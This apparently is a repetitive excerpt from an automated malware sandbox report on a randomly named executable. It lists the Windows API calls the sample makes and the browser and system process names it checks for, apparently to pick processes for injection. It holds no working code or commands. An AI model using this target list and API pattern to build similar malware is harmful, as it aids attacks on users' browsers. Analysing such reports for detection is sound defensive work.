    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe6_2_00896CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe6_2_00896CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe6_2_00896CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe6_2_00891900
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_00883610
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_00883610
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_00883610
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex9_2_02BE78A0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex9_2_02BE78A0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex9_2_02BE78A0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe9_2_02BE6CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe9_2_02BE6CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe9_2_02BE6CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe9_2_02BE6CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe9_2_02BE6CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe9_2_02BE6CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe9_2_02BE1900
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex9_2_02BD3610
